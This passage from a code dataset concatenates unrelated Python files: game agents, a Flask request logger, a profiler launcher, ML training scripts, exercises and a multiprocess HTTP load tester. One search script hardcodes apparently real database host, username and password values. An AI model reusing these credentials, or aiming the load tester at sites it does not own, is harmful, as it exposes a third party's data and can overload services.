self.colour):\n\t\t\t\t\tself.update_end(1)\n\t\t\t\telse:\n\t\t\t\t\tself.update_end(0)\n\t\t\t\treturn True\n\n\t\t\telif s[0] == \"CHANGE\":\n\t\t\t\tif s[3] == \"END\":\n\t\t\t\t\t# return True\n\t\t\t\t\tpass\n\n\t\t\t\telif s[1] == \"SWAP\":\n\t\t\t\t\tself.colour = self.opp_colour()\n\t\t\t\t\tif s[3] == self.colour:\n\t\t\t\t\t\tself.make_move()\n\n\t\t\t\telif s[3] == self.colour:\n\t\t\t\t\taction = [int(x) for x in s[1].split(\",\")]\n\t\t\t\t\tself.board[action[0]][action[1]] = self.opp_colour()\n\t\t\t\t\t#self.history.append(copy.deepcopy(self.board))\n\t\t\t\t\tself.make_move()\n\n\t\treturn False\n\n\tdef make_move(self):\n\t\t\"\"\"Makes a random move from the available pool of choices. If it can\n\t\tswap, chooses to do so 50% of the time.\n\t\t\"\"\"\n\n\t\t# print(f\"{self.colour} making move\")\n\t\tif self.colour == \"B\" and self.turn_count == 0:\n\t\t\tif choice([0, 1]) == 1:\n\t\t\t\tself.s.sendall(bytes(\"SWAP\\n\", \"utf-8\"))\n\t\t\telse:\n\t\t\t\t# same as below\n\t\t\t\tchoices = []\n\t\t\t\tfor i in range(self.board_size):\n\t\t\t\t\tfor j in range(self.board_size):\n\t\t\t\t\t\tif self.board[i][j] == 0:\n\t\t\t\t\t\t\tchoices.append((i, j))\n\t\t\t\tpos = self.choose_move(choices)\n\t\t\t\tself.s.sendall(bytes(f\"{pos[0]},{pos[1]}\\n\", \"utf-8\"))\n\t\t\t\tself.board[pos[0]][pos[1]] = self.colour\n\t\t\t\tself.history.append(copy.deepcopy(self.board))\n\n\t\telse:\n\t\t\tchoices = []\n\t\t\tfor i in range(self.board_size):\n\t\t\t\tfor j in range(self.board_size):\n\t\t\t\t\tif self.board[i][j] == 0:\n\t\t\t\t\t\tchoices.append((i, j))\n\t\t\tpos = self.choose_move(choices)\n\t\t\tself.s.sendall(bytes(f\"{pos[0]},{pos[1]}\\n\", \"utf-8\"))\n\t\t\tself.board[pos[0]][pos[1]] = self.colour\n\t\t\tself.history.append(copy.deepcopy(self.board))\n\t\tself.turn_count += 1\n\n\tdef opp_colour(self):\n\t\t\"\"\"Returns the char representation of the colour opposite to the\n\t\tcurrent one.\n\t\t\"\"\"\n\t\tif self.colour == \"R\":\n\t\t\treturn \"B\"\n\t\telif self.colour == \"B\":\n\t\t\treturn \"R\"\n\t\telse:\n\t\t\treturn \"None\"\n\n\tdef choose_move(self, choices):\n\t\tmoves_outcome = []\n\t\tfor choice in choices:\n\t\t\tr = choice[0]\n\t\t\tc = choice[1]\n\t\t\tboard_copy = copy.deepcopy(self.board)\n\t\t\t# board_copy = self.convert_board_to_list_of_strings(board_copy)\n\t\t\t# board_copy[r] = board_copy[r][:c] + self.colour + board_copy[r][c+1:]\n\t\t\tboard_copy[r][c] = self.colour\n\t\t\t\n\t\t\tmoves_outcome.append([choice, self.get_reward(board_copy)])\n\t\tmoves_outcome.sort(key = lambda v :v[1], reverse = True)\n\t\tcount = 0\n\t\twhile(count < len(moves_outcome)-1 and moves_outcome[count+1][1] == moves_outcome[0][1]):\n\t\t\tcount += 1\n\n\t\ti = random.randint(0, count)\n\n\t\treturn moves_outcome[i][0]\n\n\tdef get_reward(self, board):\n\t\tboard_string = self.convert_board_to_string(board)\n\t\treturn self.v.get(board_string, 0.5)\n\n\tdef convert_list_of_strings_to_board(self, list_of_strings):\n\t\tnew = []\n\t\tfor line in list_of_strings:\n\t\t\tnew.append(line.split(\"\"))\n\t\treturn new\n\t\t\t\n\n\tdef convert_board_to_list_of_strings(self, board):\n\t\tnew = []\n\t\tfor row in board:\n\t\t\tnew_row = \"\"\n\t\t\tfor el in row:\n\t\t\t\tnew_row += str(el)\n\t\t\tnew.append(new_row)\n\t\treturn new\n\n\tdef convert_board_to_string(self, board):\n\t\tnew = self.convert_board_to_list_of_strings(board)\n\t\treturn \"\".join(new)\n\n\tdef update_end(self, r):\n\t\tlist_states = copy.deepcopy(self.history)\n\t\tlist_states.reverse()\n\t\tfor count, state in enumerate(list_states):\n\t\t\ttd_error = r - self.get_reward(state)\n\t\t\tupdate_value = self.ALPHA * (td_error + (self.LAMBDA ** (len(list_states)-count)) )\n\t\t\tself.set_reward(state, self.get_reward(state) + update_value)\n\t\tself.store_v()\n\n\tdef set_reward(self, board_state, value):\n\t\tboard_string = self.convert_board_to_string(board_state)\n\t\tself.v[board_string] = value\n\t\n\tdef store_v(self):\n\t\tpass\n\n\t\t\n\n\n\t\t\n\n\n\nif (__name__ == \"__main__\"):\n\tagent = NaiveAgent()\n\tagent.run()\n","repo_name":"samuelzureick/HexGame","sub_path":"agents/Group52/nol.py","file_name":"nol.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2781660304","text":"import logging.config\nimport time\n\nfrom flask import request, g\n\nfrom blueprints import init_app\n\nlogging.config.fileConfig('logging.conf', defaults={'logfilename': 'log.log'})\nlogger = logging.getLogger('Request&Response')\n\napp = init_app()\n\n\n@app.before_request\ndef log_request():\n \"\"\"\n Log all requests to a file\n \"\"\"\n if request.path == '/favicon.ico':\n return\n elif request.path.startswith('/static'):\n return\n\n g.start = time.time()\n request_data = f\"\"\"\\nRequest:\n Method: {request.method}\n Path: {request.path}\n IP: {request.headers.get('X-Forwarded-For', request.remote_addr)}\n HOST: {request.host.split(':', 1)[0]}\n Headers: {dict(request.headers)}\n Params: {dict(request.args)}\n Body: {request.get_data()}\n\"\"\"\n logger.info(request_data)\n\n\n@app.after_request\ndef log_request(response):\n \"\"\"\n Log all responses to a file\n \"\"\"\n if request.path == '/favicon.ico':\n return response\n elif request.path.startswith('/static'):\n return response\n\n duration = round(time.time() - g.start, 5)\n response_data = f\"\"\"\\nResponse:\n Status code: {response.status_code}\n Time spent: {duration} secs\n\"\"\"\n logger.info(response_data)\n return response\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"necutya/flask-member-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28147052963","text":"\"\"\"\nStarts profiling, expected to start with normal program\nto start as first argument and directory to run from as\nthe second argument.\n\"\"\"\n\nimport sys\n\nif sys.platform == 'cli':\n print('Python profiling is not supported on IronPython, press enter to exit...')\n raw_input()\n sys.exit(1)\n\nimport vspyprof\nimport os\n\n# arguments are path to profiling DLL, working dir, normal arguments which should include a filename to execute\n\n# change to directory we expected to start from\nos.chdir(sys.argv[2])\nprofdll = sys.argv[1]\n\n# fix sys.path to be our real starting dir, not this one\nsys.path[0] = sys.argv[2]\ndel sys.argv[0:3]\t\n\n# set file appropriately, fix up sys.argv...\n__file__ = sys.argv[0]\n\n# remove all state we imported\ndel sys, os\n\n# and start profiling\ntry:\n vspyprof.profile(__file__, globals(), locals(), profdll)\nexcept SystemExit:\n import sys, msvcrt, os\n if sys.exc_info()[1].code:\n env_var = 'VSPYPROF_WAIT_ON_ABNORMAL_EXIT'\n else:\n env_var = 'VSPYPROF_WAIT_ON_NORMAL_EXIT'\n if env_var in os.environ:\n sys.stdout.write('Press any key to continue . . .')\n sys.stdout.flush()\n msvcrt.getch()\nexcept:\n import sys, msvcrt, os, traceback\n if 'VSPYPROF_WAIT_ON_ABNORMAL_EXIT' in os.environ:\n traceback.print_exc()\n sys.stdout.write('Press any key to continue . . .')\n sys.stdout.flush()\n msvcrt.getch()\n else:\n raise\nelse:\n import sys, msvcrt, os\n if 'VSPYPROF_WAIT_ON_NORMAL_EXIT' in os.environ:\n sys.stdout.write('Press any key to continue . . .')\n sys.stdout.flush()\n msvcrt.getch()\n","repo_name":"microsoft/PTVS","sub_path":"Python/Product/Profiling/proflaun.py","file_name":"proflaun.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":2481,"dataset":"github-code","pt":"48"} +{"seq_id":"6795204861","text":"import tensorflow as tf\nimport numpy as np\nimport time\nimport datetime\nfrom swarm import SwarmCallback\nimport os\n\ndefault_max_epochs = 5\ndefault_min_peers = 2\n\ndef load_data(dataDir):\n \"\"\"Loads the MNIST dataset.\n # Arguments\n dataDir: path where to find the mnist.npz file\n # Returns\n Tuple of Numpy arrays: `(x_train, y_train), (x_test, y_test)`.\n \"\"\"\n path = os.path.join(dataDir,'mnist.npz') \n\n with np.load(path, allow_pickle=True) as f:\n x_train, y_train = f['x_train'], f['y_train']\n x_test, y_test = f['x_test'], f['y_test']\n return (x_train, y_train), (x_test, y_test)\n\n\ndef main():\n dataDir = os.getenv('DATA_DIR', './data')\n modelDir = os.getenv('MODEL_DIR', './model')\n modelDir = os.getenv('MODEL_DIR', './model')\n max_epochs = int(os.getenv('MAX_EPOCHS', str(default_max_epochs)))\n min_peers = int(os.getenv('MIN_PEERS', str(default_min_peers)))\n\n model_name = 'mnist_tf'\n\n (x_train, y_train),(x_test, y_test) = load_data(dataDir)\n x_train, x_test = x_train / 255.0, x_test / 255.0\n\n model = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, activation=tf.nn.softmax)\n ])\n\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n # Create Swarm callback\n swarmCallback = SwarmCallback(sync_interval=128,\n min_peers=min_peers,\n val_data=(x_test, y_test),\n val_batch_size=32,\n model_name=model_name)\n\n model.fit(x_train, y_train, \n batch_size = 128,\n epochs=max_epochs,\n verbose=1, \n callbacks=[swarmCallback])\n\n # Save model and weights\n model_path = os.path.join(modelDir, model_name)\n model.save(model_path)\n print('Saved the trained model!')\n\nif __name__ == '__main__':\n main()\n","repo_name":"CoderTylor/IoV-SFDL-Swarm-Federated-Deep-Learning","sub_path":"swarm-learning/examples/ws-mnist-keras/node1/model/mnist_tf.py","file_name":"mnist_tf.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"74622515025","text":"import sys\nimport threading\nimport multiprocessing\nimport time\nimport signal\nfrom multiprocessing import Manager\nfrom urllib.request import urlopen\n\ndo_count = 0\nis_running = True\n\n\nclass WorkThread(threading.Thread):\n def __init__(self, url):\n threading.Thread.__init__(self)\n self.url = url\n self.isSuccess = True\n\n def run(self):\n try:\n response = urlopen(self.url)\n except OSError:\n self.isSuccess = False\n pass\n\n def get_result(self):\n return self.isSuccess\n\n\nclass JobProcess(multiprocessing.Process):\n def __init__(self, thread_count, url, extime):\n multiprocessing.Process.__init__(self)\n self.thread_count = thread_count\n self.url = url\n if extime < 0:\n extime = 0\n self.extime = extime\n \"\"\"这里用于产生一个共享变量List否则两个变量始终是0\"\"\"\n self.success = Manager().list()\n self.failure = Manager().list()\n\n def run(self):\n\n time.sleep(self.extime)\n\n works = []\n\n for i in range(self.thread_count):\n \"\"\"这里的args非常的恶心传参(url)则会报错(url,)这样才会成功\"\"\"\n works.append(WorkThread(self.url))\n\n for w in works:\n w.start()\n w.join()\n if w.get_result():\n self.success.append(w.get_result())\n else:\n self.failure.append(w.get_result())\n pass\n\n def get_success_count(self):\n return len(self.success)\n\n def get_failure_count(self):\n return len(self.failure)\n\n\ndef exec_thread(count, process_count, thread_count, interval_time, url):\n global do_count, is_running\n if do_count >= count:\n sys.exit(0)\n else:\n do_count += 1\n\n if process_count <= 0 or thread_count <= 0:\n print(\"警告:执行进程数或者线程数为零\")\n sys.exit(0)\n\n ctime, diff_time, jobs = time.time(), process_count * 0.5, []\n for i in range(process_count):\n job = JobProcess(thread_count, url, diff_time)\n job.start()\n jobs.append(job)\n diff_time = diff_time - (time.time() - ctime)\n\n success = 0\n failure = 0\n\n for j in jobs:\n j.join()\n success += j.get_success_count()\n failure += j.get_failure_count()\n\n print(\"执行结果| \", \"耗时=\" + str(time.time() - ctime) + \" | \", \"进程数=\" + str(process_count) + \" | \",\n \"每个进程的线程数=\" + str(thread_count) + \" | \", \"成功数=\" + str(success) + \" | \", \"失败数=\" + str(failure))\n\n if is_running:\n next_timer = threading.Timer(interval_time, exec_thread,\n [count, process_count, thread_count, interval_time, url])\n next_timer.start()\n\n\ndef quit_pro(signum, frame):\n global is_running\n is_running = False\n\n\nhelpStr = \"argv[0] #执行的次数\\r\\n\" + \\\n \"argv[1] #进程数\\r\\n\" + \\\n \"argv[2] #线程数\\r\\n\" + \\\n \"argv[3] #间隔时间s\\r\\n\" + \\\n \"argv[4] #访问的url\\r\\n\"\n\nargv = sys.argv\nif __name__ == \"__main__\":\n try:\n if len(argv) != 6:\n print(\"参数错误,传参格式如下:\\r\\n\" + helpStr)\n print(argv)\n sys.exit(-1)\n\n signal.signal(signal.SIGINT, quit_pro)\n signal.signal(signal.SIGTERM, quit_pro)\n\n c = int(argv[1])\n pc = int(argv[2])\n tc = int(argv[3])\n s = int(argv[4])\n url = str(argv[5])\n\n timer = threading.Timer(0, exec_thread, [c, pc, tc, s, url])\n timer.start()\n except Exception:\n raise\n","repo_name":"yangankang/examples","sub_path":"python_tools/press_test.py","file_name":"press_test.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42018828744","text":"import sys\nsys.path.append(r\"C:\\Users\\souli\\Documents\\Travail\\EFREI\\M2\\PFE\\MLUI\\PluginSource\")\n\nfrom python.MCTSAgent.Agent import Agent\nfrom python.Train.Residual_CNN import HIDDEN_CNN_LAYERS\nfrom python.Train.Residual_CNN import Residual_CNN, REG_CONST\nfrom python.connect4.Game import GRID_SHAPE, Game, GameState\nfrom IPython.display import clear_output\nimport numpy as np\n\nNB_SIMULATION = 50\nTOURNAMENT_NUMBER = 1\nAGENT_VERSION = 9\n\nresidual_CNN = Residual_CNN(REG_CONST, (1,) + GRID_SHAPE, GRID_SHAPE[1], HIDDEN_CNN_LAYERS)\nresidual_CNN.read(TOURNAMENT_NUMBER, AGENT_VERSION,\"./python/Train/\")\n\nai_agent = Agent(\"Demo ML Agent\", nb_simulations=NB_SIMULATION, cpuct=1, model=residual_CNN,\n turns_until_deterministic=0, temperature=1)\n\nprint(\"Ai loaded\")\n\ndef play(board=None, me=1):\n print(\"\\nLet's play\")\n print(board)\n #Default board\n #if board==None:\n board = [[0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0]]\n #Convert board for the AI\n board = np.array(board, dtype=np.int8) \n print(\"board converted\")\n\n #Create game state\n state = GameState(me, board=board)\n print(state)\n\n #Ask agent for its decision\n action, _, _ = ai_agent.chose_action_from_mcts(state, 1)\n print(\"decision: \", action)\n return action\n \"\"\"\n \n #Make a prediction on the board\n result = residual_CNN.predict(inputToModel) \n print(result)\n\n #Send the action decided by the AI\n choice = np.argmax(result[1][0])\n return choice\n \"\"\"\n\ndef playerVersusAI(ai_player, ai_plays_first=False, debug=False):\n\n env = Game()\n state = env.reset()\n\n turn = 0\n done = False\n\n while not done:\n\n print(env.gameState)\n\n turn = turn + 1\n is_ai_current_player = True if (turn % 2 == 0) and not ai_plays_first else False\n\n ## If the AI player has to play\n if is_ai_current_player:\n action, action_scores, current_proba_victory = ai_player.chose_action_from_mcts(state, turn, debug)\n \n if not debug:\n clear_output(wait=True)\n print('action: ', action)\n print(['{0:.2f}'.format(np.round(x,2)) for x in action_scores])\n print('proba of victory before playing the action: ', np.round(current_proba_victory,2))\n else:\n correct_action = False\n while not correct_action:\n print(\"Please enter an integer between 0 and \" + str(GRID_SHAPE[1]-1))\n action = int(input())\n correct_action = True if (action >= 0 and action < GRID_SHAPE[1]) else False\n\n if not debug:\n clear_output(wait=True)\n\n state, value, done = env.step(action)\n print('Current state value (1 if victory, 0 otherwise): ', value)\n print('done: ', done)\n \n # Print the board when the game is finished\n print(env.gameState)\n\nif __name__ == '__main__':\n playerVersusAI(ai_agent)","repo_name":"ZaChr0me/MLUI","sub_path":"PluginSource/python/AiDemo.py","file_name":"AiDemo.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74857082704","text":"a=\"123456789\"\r\n\r\nfor i in range(9999,9000,-1):\r\n\tb=str(i*1)\r\n\tc=str(i*2)\r\n\td=b+c\r\n\te=d\r\n\te=sorted(e)\r\n\te = ''.join(e)\r\n\tif e==a:\r\n\t\tprint(d)\r\n\t\tbreak\r\n\r\n\r\n\r\n","repo_name":"bhanusiddhannagari/project-euler","sub_path":"p38.py","file_name":"p38.py","file_ext":"py","file_size_in_byte":157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34461698844","text":"import random\nimport sys\nimport pygame\nfrom constants import black, white, display_height, display_width, car_width, clock, gameDisplay, carImg, carImg2, bg\nfrom functions import text_objects, things, car, car2, things_dodged, crash\n\n# стартуем в файле модули пайгейм\npygame.init()\n\n# функция для запуска игры\ndef game_loop():\n # размещение\n x = (display_width * 0.75)\n y = (display_height * 0.8)\n x1 = (display_width * 0.25)\n y1 = (display_height * 0.8)\n # параметры для появления things\n thing_startx = random.randrange(0, display_width)\n thing_starty = -600\n thing_speed = 5\n thing_width = 72\n thing_height = 72\n\n # базовое значение для dodged\n dodged = 0\n\n x_change = 0 # позиция\n x1_change = 0 # позиция\n gameExit = False\n\n while not gameExit:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n gameExit = True\n sys.exit()\n # блок для обработки нажатия на клавиши\n if event.type == pygame.KEYDOWN:\n # если нажали на esc, то окно закр.\n if event.key == pygame.K_ESCAPE:\n crashed = True\n pygame.quit()\n sys.exit()\n if event.key == pygame.K_LEFT:\n x_change = -5\n\n if event.key == pygame.K_a:\n x1_change = -5\n\n elif event.key == pygame.K_RIGHT:\n x_change = 5\n\n elif event.key == pygame.K_d:\n x1_change = 5\n\n # условия для движения\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n x_change = 0\n # условия для движения\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_a or event.key == pygame.K_d:\n x1_change = 0\n # смена позиции\n x += x_change\n\n # смена позиции 2\n x1 += x1_change\n\n # фон\n gameDisplay.blit(bg,(0,0))\n # вызов things\n things(thing_startx, thing_starty)\n thing_starty += thing_speed\n\n # создаем машину\n car(x, y)\n things_dodged(dodged)\n\n # создаем машину 2\n car2(x1, y1)\n things_dodged(dodged)\n\n # задаем границы\n if x > display_width - car_width or x < 0:\n gameExit = True\n crash()\n # задаем границы\n if x1 > display_width - car_width or x1 < 0:\n gameExit = True\n crash()\n\n if thing_starty > display_height:\n thing_starty = 0 - thing_height\n thing_startx = random.randrange(0, display_width)\n dodged += 1\n thing_speed += 1\n # thing_width += (dodged * 1.2)\n\n if y < thing_starty + thing_height:\n\n if x > thing_startx and x < thing_startx + thing_width or x + car_width > thing_startx and x + car_width < thing_startx + thing_width:\n crash()\n if y1 < thing_starty + thing_height:\n\n if x1 > thing_startx and x1 < thing_startx + thing_width or x1 + car_width > thing_startx and x1 + car_width < thing_startx + thing_width:\n crash()\n\n # проверяем на обновления дисплея\n pygame.display.update()\n # кадры в секунду = 60\n clock.tick(60)\n\ngame_loop()\npygame.quit()\nquit()","repo_name":"Maginiex/Don-t-crush-my-car-dude-","sub_path":"venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25052315417","text":"def solution(classes, m):\n answer = 0\n for students in classes: #교실별 학생수 하나씩 대입\n answer += students// m #학생수 // 답당 학생수 80//30 => 2\n if students % m != 0: #나머지가 있으묜\n answer += 1 #조교 한명 추가\n return answer\n\nclasses = [80, 45, 33, 20]\nm = 30\nret = solution(classes, m)\nprint(\"solution 함수의 반환 값은\", ret, \"입니다.\")","repo_name":"krsthg/python3","sub_path":"COS PRO_2/4차시/문제 4.py","file_name":"문제 4.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72549285586","text":"'''\nFaça um programa que leia 5 valores inteiros. Conte quantos destes valores \ndigitados são pares e mostre esta informação.\n'''\ni = 0\nnum = []\nwhile i < 5:\n\ta = int(input())\n\tnum.append(a)\n\ti+=1\ni = 0\nfor x in num:\n\tif x % 2 == 0:\n\t\ti +=1\nprint('%d valores pares' %i)","repo_name":"ClaudiaStrm/UriOnlineJudge","sub_path":"i_paresEntre5Num.py","file_name":"i_paresEntre5Num.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32334651282","text":"from googlesearch import search\nimport mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"hosp.ctt1wmriltj5.us-east-2.rds.amazonaws.com\",\n user=\"rfodge\",\n passwd=\"Yy6bxM-G\",\n database=\"hosp\"\n)\n\nmycursor = mydb.cursor()\nmycursor.execute(\"SELECT WEBSITE FROM hospitalList\")\nmyresult = mycursor.fetchall()\n\nwebsiteList = []\n\nfor x in myresult:\n websiteList.append(str(x))\n\nwebsiteList = [e[3:len(e)-3] for e in websiteList]\nPDFresultsList = []\nCSVresultsList = []\nXLSresultsList = []\nXLSXresultsList = []\nXMLresultsList = []\n\nfor y in websiteList:\n print('------')\n PDFquery = \"site:\" + y + \" filetype:pdf\"\n CSVquery = \"site:\" + y + \" filetype:csv\"\n XLSquery = \"site:\" + y + \" filetype:xls\"\n XLSXquery = \"site:\" + y + \" filetype:xlsx\"\n XMLquery = \"site:\" + y + \" filetype:xml\"\n for a in search(PDFquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n print(a)\n for b in search(CSVquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n print(b)\n for c in search(XLSquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n print(c)\n for d in search(XLSXquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n print(d)\n for e in search(XMLquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n print(e)\n","repo_name":"reedfodge/hosp","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11343400228","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\n\nimport matplotlib.pyplot as plt\n\n\nclass Stats:\n def __init__(self, data):\n\n baseline_array_cum, actual_array_cum, baseline_median_array_cum = self._calc_baseline_and_actual(\n data\n )\n\n self.baseline_array_cum = baseline_array_cum\n self.actual_array_cum = actual_array_cum\n self.baseline_median_array_cum = baseline_median_array_cum\n self.first_20mins_mask = actual_array_cum < 20 * 60\n self.data = data\n\n def full_stats(self, tests, names, data_type=\"diff\"):\n\n if data_type not in [\"diff\", \"speed\", \"duration\"]:\n raise ValueError(\"data_type must be: diff, speed or duration\")\n\n rows = []\n\n header = \" & MAPE & RMSE & MAE & PW10 & MAPE & RMSE & MAE & PW10 \\\\\\\\\"\n print(header)\n rows.append(header)\n\n rows.append(\n self._stats(\n self.actual_array_cum,\n self.baseline_array_cum,\n \"Mean (chd)\",\n self.first_20mins_mask,\n )\n )\n\n rows.append(\n self._stats(\n self.actual_array_cum,\n self.baseline_median_array_cum,\n \"Median (chd)\",\n self.first_20mins_mask,\n )\n )\n\n for i in range(len(tests)):\n test_array_cum = self._calc_prediction_cum_journeys(\n self.data, test=tests[i], data_type=data_type\n )\n\n rows.append(\n self._stats(\n self.actual_array_cum,\n test_array_cum,\n names[i],\n self.first_20mins_mask,\n )\n )\n\n return \"\\n\".join(rows) + \"\\n\"\n\n def single_row(self, test, name, data_type=\"diff\"):\n\n if data_type not in [\"diff\", \"speed\", \"duration\"]:\n raise ValueError(\"data_type must be: diff, speed or duration\")\n\n test_array_cum = self._calc_prediction_cum_journeys(\n self.data, test=test, data_type=data_type\n )\n\n return str(\n self._stats(\n self.actual_array_cum, test_array_cum, name, self.first_20mins_mask\n )\n + str(\"\\n\")\n )\n\n def draw_time(self, data, names, filename=None, data_type=\"duration\"):\n\n if data_type not in [\"diff\", \"speed\", \"duration\"]:\n raise ValueError(\"data_type must be: diff, speed or duration\")\n\n for i in range(len(data)):\n\n plt.plot(\n self._make_accuracy_matrix_minutes(\n self._calc_prediction_cum_journeys(\n self.data, test=data[i], data_type=data_type\n ),\n self.actual_array_cum,\n )[0][0, :],\n label=names[i],\n )\n\n plt.xlim(0, 20)\n plt.title(\"PW10 Scores By How Far\\nIn Advance A Prediction Is\")\n plt.xlabel(\"Time (minutes)\")\n plt.ylabel(\"PW10 Score (%)\")\n plt.legend()\n if filename is not None:\n plt.savefig(filename, bbox_inches=\"tight\")\n plt.show()\n\n def _make_accuracy_matrix_minutes(self, predict, max_threshold=10):\n\n actual_ints = np.array(self.actual_array_cum / 60).astype(int)\n\n rows = 1 # int(max_threshold / 10)\n\n max_a = np.nanmax(self.actual_array_cum) / 60\n\n accuracies_table = np.empty((rows, int(max_a)))\n drift_table = np.empty((rows, int(max_a)))\n frequency = np.empty(int(max_a))\n\n print(\"\")\n\n for i in range(int(max_a)):\n print(\".\", end=\"\", flush=True)\n mask = actual_ints == i\n\n frequency[i] = np.count_nonzero(mask)\n\n for j in range(1, rows + 1):\n accuracy, drift = self._percent_in_x_percent(\n predict[mask], self.actual_array_cum[mask], j * 10\n )\n accuracies_table[j - 1, i] = accuracy\n drift_table[j - 1, i] = drift\n\n return accuracies_table, frequency, drift_table\n\n def _percent_in_x_percent(self, predict, actual, threshold):\n\n if np.count_nonzero(~np.isnan(actual)) == 0:\n return 0, 0\n\n threshold = threshold / 100\n\n mask = ~np.isnan(predict) & ~np.isnan(actual)\n\n pass_count = np.count_nonzero(\n (predict[mask] < actual[mask] * (1 + threshold))\n & (predict[mask] > actual[mask] * (1 - threshold))\n )\n\n over_count = np.count_nonzero(predict[mask] > actual[mask] * (1 + threshold))\n\n under_count = np.count_nonzero(predict[mask] < actual[mask] * (1 - threshold))\n\n pass_percent = pass_count / np.count_nonzero(mask) * 100\n\n if over_count + under_count == 0:\n drift = 0.5\n else:\n drift = over_count / (over_count + under_count)\n\n return pass_percent, drift\n\n def _stats(self, actual_array_cum, test_array_cum, name, first_20mins_mask):\n\n mape_short = self._MAPE(test_array_cum[:, 0], actual_array_cum[:, 0])\n mape_long = self._MAPE(test_array_cum, actual_array_cum)\n # rmse_short = np.sqrt(\n # mean_squared_error(actual_array_cum[:, 0], test_array_cum[:, 0])\n # )\n rmse_short = np.sqrt(\n np.nanmean(np.square(actual_array_cum[:, 0] - test_array_cum[:, 0]))\n )\n rmse_long = np.sqrt(np.nanmean(np.square(actual_array_cum - test_array_cum)))\n # mae_short = mean_absolute_error(actual_array_cum[:, 0], test_array_cum[:, 0])\n mae_short = np.nanmean(np.abs(actual_array_cum[:, 0] - test_array_cum[:, 0]))\n mae_long = np.nanmean(np.abs(actual_array_cum - test_array_cum))\n\n pass_count_short = np.count_nonzero(\n (test_array_cum[:, 0] < actual_array_cum[:, 0] * 1.1)\n & (test_array_cum[:, 0] > actual_array_cum[:, 0] * 0.9)\n )\n\n pass_fraction_short = pass_count_short / actual_array_cum.shape[0]\n\n pass_count_long = np.count_nonzero(\n (\n test_array_cum[first_20mins_mask]\n < actual_array_cum[first_20mins_mask] * 1.1\n )\n & (\n test_array_cum[first_20mins_mask]\n > actual_array_cum[first_20mins_mask] * 0.9\n )\n )\n pass_fraction_long = pass_count_long / np.count_nonzero(first_20mins_mask)\n\n results = f\"{name} & {mape_short:0.3f} & {rmse_short:0.3f} & {mae_short:0.3f} & {pass_fraction_short*100:0.3f} & {mape_long:0.3f} & {rmse_long:0.3f} & {mae_long:0.3f} & {pass_fraction_long*100:0.3f} \\\\\\\\\"\n\n print(results)\n\n return results\n\n def _MAPE(self, forecast, actual):\n\n if len(forecast) != len(actual):\n raise ValueError(\n \"Could not calculate MAPE, forecast and actual arrays are different length\"\n )\n\n forecast = np.asarray(forecast)\n actual = np.asarray(actual)\n\n with np.errstate(divide=\"ignore\", invalid=\"ignore\"):\n\n division = (actual - forecast) / actual\n\n division[actual == 0] = 0\n\n valid_count = actual.size - np.count_nonzero(\n (actual == 0) | (np.isnan(actual))\n )\n\n # Instead of dividing by n we count by the number of non-zero and non-nan values.\n # Essentially ignoring all cases where the actual value is zero.\n mape = 100 / valid_count * np.nansum(np.abs(division))\n\n return mape\n\n def _create_padded_array(self, a, row_start, n_rows):\n # From: https://stackoverflow.com/questions/51597849/padding-a-numpy-array-with-offsets-for-each-data-column\n\n r = np.arange(n_rows)[:, None]\n row_start = np.asarray(row_start)\n mask = (r >= row_start) & (r < row_start + a.shape[0])\n\n out = np.zeros(mask.shape, dtype=a.dtype)\n out[:] = np.nan\n out.T[mask.T] = a.ravel(\"F\")\n return out\n\n def _create_triangle(self, input_array, max_width=70):\n\n filled_values = np.empty((input_array.shape[0], 70)).astype(float)\n\n filled_values[:] = input_array[:, None]\n\n return self._create_padded_array(\n filled_values, list(range(70)), input_array.shape[0] + 71\n 